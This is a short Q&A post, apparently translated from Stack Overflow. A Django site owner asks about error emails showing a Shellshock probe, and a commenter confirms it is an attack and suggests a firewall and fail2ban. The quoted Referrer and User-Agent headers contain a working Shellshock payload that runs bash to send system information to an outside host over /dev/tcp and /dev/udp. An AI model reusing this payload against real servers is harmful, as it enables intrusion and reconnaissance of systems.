【发布时间】:2015-06-22 20:19:03
【问题描述】:
我已设置 django 以在任何请求失败时通过电子邮件提醒我,并且我不断收到此电子邮件:
Referrer: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
Requested URL: /cgi-bin/index.cgi
User agent: () { :;}; /bin/bash -c "echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/tcp/<<unknown_ip>>/21; /bin/uname -a > /dev/tcp/<<unknown_ip>>/21; echo <<my_server_ip>>/cgi-bin/index.cgi > /dev/udp/<<unknown_ip>>/21"
IP address: 127.0.0.1
这是什么意思?我应该打扰吗?
我正在使用 nginx、ubuntu、gunicorn。
【问题讨论】:
-
这绝对是一次攻击,但这并不意味着它是成功的。提高安全性的一个很好的起点是设置 iptables(防火墙)和 fail2ban 等工具。您可能会在 security.stackexchange.com 上得到更好的回应。